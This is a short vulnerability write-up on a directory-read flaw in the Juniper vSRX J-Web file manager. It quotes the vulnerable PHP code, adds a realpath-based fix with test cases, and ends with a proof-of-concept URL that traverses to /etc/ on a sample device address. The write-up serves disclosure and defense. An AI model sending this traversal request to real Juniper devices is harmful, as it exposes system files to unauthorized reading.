Juniper 1-day: arbitrary directory read
Tested version
junos-vsrx3-x86-64-20.3R1.8.ide.ova
Vulnerability walkthrough
The vulnerability is in html\modules\manage\files\main.php
function do_manage_files()
{
    ......
    case MANAGE_FILES_BROWSE:
        // Browse (Download and Delete) files
        $path = get_val_or_null($_GET, 'path');
        // The vulnerability is here: this only checks that path exists,
        // it does not check that the path is legitimate.
        if (do_manage_files_validate_file($path, null)) {
            $sections = do_manage_files_browse($path);
            break;
        } else {
            $sections = do_manage_files_main();
        }
        break;
    }
    .....
}
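One way to add the missing path check, as an added example that is not Juniper's code: canonicalize the requested path with realpath() and accept it only when the result stays inside an allowed base directory. The helper name resolve_inside_base() and the choice of base directory are assumptions, and the directory tree is constructed under the temp directory for the demonstration.

```php
<?php
// Added example, not Juniper's code. resolve_inside_base() is a hypothetical
// helper; the allowed base directory is an assumption.

// Return the canonical path if $path resolves inside $base, otherwise false.
function resolve_inside_base($path, $base)
{
    if (!is_string($path) || $path === '' || strpos($path, "\0") !== false) {
        return false;
    }
    $real_base = realpath($base);
    $real_path = realpath($path); // collapses "..", "." and symlinks; false if missing
    if ($real_base === false || $real_path === false) {
        return false;
    }
    // Compare on a directory boundary so ".../log2" does not match ".../log".
    $prefix = rtrim($real_base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($real_path === $real_base || strncmp($real_path, $prefix, strlen($prefix)) === 0) {
        return $real_path;
    }
    return false;
}

// Constructed sample tree under the temp directory so the script runs offline.
$root = sys_get_temp_dir() . '/jweb_demo_' . getmypid();
foreach (array('var/log/sub', 'var/log2', 'etc') as $dir) {
    mkdir("$root/$dir", 0700, true);
}
$base = "$root/var/log";

// Constructed requests: candidate path => whether it should be accepted.
$cases = array(
    "$root/var/log"            => true,
    "$root/var/log/sub"        => true,
    "$root/var/log/../../etc/" => false, // same shape as the path in the PoC
    "$root/var/log/../log2"    => false, // sibling sharing the base's prefix
    "$root/var/log/missing"    => false, // realpath() fails on nonexistent paths
    ""                         => false,
);
foreach ($cases as $candidate => $expected) {
    $allowed = resolve_inside_base($candidate, $base) !== false;
    if ($allowed !== $expected) {
        throw new RuntimeException("unexpected result for: $candidate");
    }
    printf("%-5s %s\n", $allowed ? 'allow' : 'deny', $candidate);
}
```

In a handler like the one above, the canonical path returned by the check, not the raw path parameter, is what should reach the file-browsing function.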
Exploit PoC
https://192.168.1.100/manage?m[]=files&action=browse&path=/var/log/../../etc/